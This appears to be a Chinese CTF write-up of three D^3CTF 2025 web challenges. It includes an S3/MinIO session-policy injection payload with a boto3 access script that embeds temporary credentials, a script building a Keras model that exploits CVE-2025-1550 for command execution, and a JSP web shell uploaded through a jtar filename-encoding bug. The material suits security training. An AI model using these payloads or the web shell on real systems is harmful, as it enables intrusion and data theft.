【Web】D^3CTF 2025题解_d3ctf
目录
d3invitation
d3model
d3jtar
d3invitation
获取STS的时候将object_name改包为flag
带着返回的aksk和sessiontoken访问存储桶,发现权限不够
返回的sessiontoken是个jwt
对sessionPolicy字段进行base64解码发现是一些存储桶权限策略
参考:Identity-based policy examples for Amazon S3 - Amazon Simple Storage Service
Resource处可控,可以进行注入
尝试注入,对全资源开全权限
{\"Effect\":\"Allow\",\"Action\":[\"s3:*\"],\"Resource\":[\"arn:aws:s3:::*\"]}
构造一下payload
要先用\"]}进行闭合
{\"object_name\":\"*\\\"]},{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":[\\\"s3:*\\\"],\\\"Resource\\\":[\\\"arn:aws:s3:::*\"}
让gpt搓一个脚本
import boto3from botocore.client import Configfrom botocore.exceptions import ClientErrorimport os# MinIO 服务器配置MINIO_ENDPOINT = \"http://35.241.98.126:30822\" # 替换为您的 MinIO 服务器地址# 已有的 STS 临时凭证STS_CREDENTIALS = { \"access_key_id\": \"P1MVR0NZMHK3RO8EE5S1\", \"secret_access_key\": \"YuY1xd+J0Ch0wYlrZjznL2DGjzFktbxFjfhxfPN3\", \"session_token\": \"eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhY2Nlc3NLZXkiOiJQMU1WUjBOWk1ISzNSTzhFRTVTMSIsImV4cCI6MTc0OTA1ODQ2MSwicGFyZW50IjoiQjlNMzIwUVhIRDM4V1VSMk1JWTMiLCJzZXNzaW9uUG9saWN5IjoiZXlKV1pYSnphVzl1SWpvaU1qQXhNaTB4TUMweE55SXNJbE4wWVhSbGJXVnVkQ0k2VzNzaVJXWm1aV04wSWpvaVFXeHNiM2NpTENKQlkzUnBiMjRpT2xzaWN6TTZVSFYwVDJKcVpXTjBJaXdpY3pNNlIyVjBUMkpxWldOMElsMHNJbEpsYzI5MWNtTmxJanBiSW1GeWJqcGhkM002Y3pNNk9qcGtNMmx1ZG1sMFlYUnBiMjR2S2lKZGZTeDdJa1ZtWm1WamRDSTZJa0ZzYkc5M0lpd2lRV04wYVc5dUlqcGJJbk16T2lvaVhTd2lVbVZ6YjNWeVkyVWlPbHNpWVhKdU9tRjNjenB6TXpvNk9pb2lYWDFkZlE9PSJ9.gX4HWf3uNfXQsYY8M-mBT4lRRn1GfDG59X7ZKrRUz4vJ5UpePgW80vL-dK8VAZXiMmBvVfRpvH2JYiqVtPBtHg\"}def create_s3_client(): \"\"\"创建并返回配置好的 S3 客户端\"\"\" return boto3.client( \'s3\', endpoint_url=MINIO_ENDPOINT, aws_access_key_id=STS_CREDENTIALS[\"access_key_id\"], aws_secret_access_key=STS_CREDENTIALS[\"secret_access_key\"], aws_session_token=STS_CREDENTIALS[\"session_token\"], config=Config(signature_version=\'s3v4\') )def list_buckets(s3_client): \"\"\"列出所有存储桶\"\"\" try: print(\"\\n正在获取存储桶列表...\") response = s3_client.list_buckets() if not response[\'Buckets\']: print(\"没有找到任何存储桶\") return [] print(\"\\n存储桶列表:\") buckets = [] for i, bucket in enumerate(response[\'Buckets\'], 1): print(f\"{i}. {bucket[\'Name\']} (创建于: {bucket[\'CreationDate\']}\") buckets.append(bucket[\'Name\']) return buckets except ClientError as e: handle_s3_error(e) return []def list_objects(s3_client, bucket_name): \"\"\"列出存储桶中的所有对象\"\"\" try: print(f\"\\n正在获取存储桶 \'{bucket_name}\' 中的对象列表...\") response = s3_client.list_objects_v2(Bucket=bucket_name) if \'Contents\' not in response: print(f\"存储桶 \'{bucket_name}\' 为空\") return [] print(f\"\\n存储桶 \'{bucket_name}\' 中的对象:\") objects = [] for i, obj in enumerate(response[\'Contents\'], 1): # 转换字节为更友好的格式 size = obj[\'Size\'] size_str = f\"{size} 字节\" if size > 1024*1024: size_str = f\"{size/(1024*1024):.2f} MB\" elif size > 1024: size_str = f\"{size/1024:.2f} KB\" print(f\"{i}. {obj[\'Key\']} (大小: {size_str}, 最后修改: {obj[\'LastModified\']}\") objects.append(obj[\'Key\']) return objects except ClientError as e: handle_s3_error(e) return []def download_file(s3_client, bucket_name, object_key, local_path=None): \"\"\"下载文件到本地\"\"\" try: # 如果没有指定本地路径,使用对象名作为文件名 if local_path is None: local_path = os.path.basename(object_key) # 确保目录存在 os.makedirs(os.path.dirname(local_path), exist_ok=True) print(f\"\\n正在下载: {object_key} -> {local_path}\") s3_client.download_file(bucket_name, object_key, local_path) # 验证下载是否成功 if os.path.exists(local_path): size = os.path.getsize(local_path) print(f\"✓ 下载成功! 文件大小: {size} 字节\") return True else: print(\"× 下载失败: 本地文件未创建\") return False except ClientError as e: handle_s3_error(e) return False except Exception as e: print(f\"下载过程中发生错误: {str(e)}\") return Falsedef handle_s3_error(e): \"\"\"处理 S3 错误并显示友好信息\"\"\" error_code = e.response.get(\'Error\', {}).get(\'Code\', \'UnknownError\') print(f\"\\n× 操作失败! 错误代码: {error_code}\") error_messages = { \'NoSuchBucket\': \"存储桶不存在\", \'AccessDenied\': \"访问被拒绝 - 权限不足\", \'ExpiredToken\': \"凭证已过期 - 需要刷新 STS 令牌\", \'InvalidAccessKeyId\': \"无效的访问密钥 ID\", \'SignatureDoesNotMatch\': \"签名不匹配 - 检查密钥和区域设置\", \'NoSuchKey\': \"请求的对象不存在\", \'404\': \"资源未找到\" } message = error_messages.get(error_code, f\"未知错误: {str(e)}\") print(f\"错误原因: {message}\") # 显示完整错误信息(调试用) print(f\"\\n完整错误响应:\\n{e.response}\")def main_menu(): \"\"\"主菜单界面\"\"\" s3_client = create_s3_client() while True: print(\"\\n\" + \"=\"*50) print(\"MinIO STS 访问工具\") print(\"=\"*50) print(\"1. 列出所有存储桶\") print(\"2. 列出存储桶中的对象\") print(\"3. 下载文件\") print(\"4. 退出\") choice = input(\"\\n请选择操作 (1-4): \") if choice == \'1\': list_buckets(s3_client) elif choice == \'2\': bucket_name = input(\"请输入存储桶名称: \") list_objects(s3_client, bucket_name) elif choice == \'3\': bucket_name = input(\"请输入存储桶名称: \") object_key = input(\"请输入对象名称: \") local_path = input(\"请输入本地保存路径 (回车使用默认名称): \") if not local_path: local_path = None download_file(s3_client, bucket_name, object_key, local_path) elif choice == \'4\': print(\"感谢使用,再见!\") break else: print(\"无效选择,请重新输入\")if __name__ == \"__main__\": try: main_menu() except KeyboardInterrupt: print(\"\\n程序已中断\")
拿到flag
d3model
快速定位CVE-2025-1550
Inside CVE-2025-1550: Remote Code Execution via Keras Models
跑一下脚本
import zipfileimport jsonfrom keras.models import Sequentialfrom keras.layers import Denseimport numpy as npimport osmodel_name=\"model.keras\"x_train = np.random.rand(100, 28*28) y_train = np.random.rand(100) model = Sequential([Dense(1, activation=\'linear\', input_dim=28*28)])model.compile(optimizer=\'adam\', loss=\'mse\')model.fit(x_train, y_train, epochs=5)model.save(model_name)with zipfile.ZipFile(model_name,\"r\") as f: config=json.loads(f.read(\"config.json\").decode()) config[\"config\"][\"layers\"][0][\"module\"]=\"keras.models\"config[\"config\"][\"layers\"][0][\"class_name\"]=\"Model\"config[\"config\"][\"layers\"][0][\"config\"]={ \"name\":\"mvlttt\", \"layers\":[ { \"name\":\"mvlttt\", \"class_name\":\"function\", \"config\":\"Popen\", \"module\": \"subprocess\", \"inbound_nodes\":[{\"args\":[[\"sh\",\"-c\",\"env > /app/index.html\"]],\"kwargs\":{\"bufsize\":-1}}] }], \"input_layers\":[[\"mvlttt\", 0, 0]], \"output_layers\":[[\"mvlttt\", 0, 0]] }with zipfile.ZipFile(model_name, \'r\') as zip_read: with zipfile.ZipFile(f\"tmp.{model_name}\", \'w\') as zip_write: for item in zip_read.infolist(): if item.filename != \"config.json\": zip_write.writestr(item, zip_read.read(item.filename))os.remove(model_name)os.rename(f\"tmp.{model_name}\",model_name)with zipfile.ZipFile(model_name,\"a\") as zf: zf.writestr(\"config.json\",json.dumps(config))print(\"[+] Malicious model ready\")
上传keras文件
环境变量里取到flag
d3jtar
https://github.com/kamranzafar/jtar/pull/36
关键在于工具类 Backup 所使用的 jtar 打包库
jtar 的 TarOutputStream 打包文件时,它会把文件名中的 UTF-8 强制转化为 UTF-16(Java的char类型是16位的Unicode字符(UTF-16编码))
图中是对这个的fix
注意到对同一字符,UTF-8和UTF-16的后两位相同
现在去寻找后两位为6A 73 70的字符
上传yjh.ᅪᅳᅰ
<% if(\"0x401\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(\"
\"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(\"\"); } %>
再tar&untar
环境变量读flag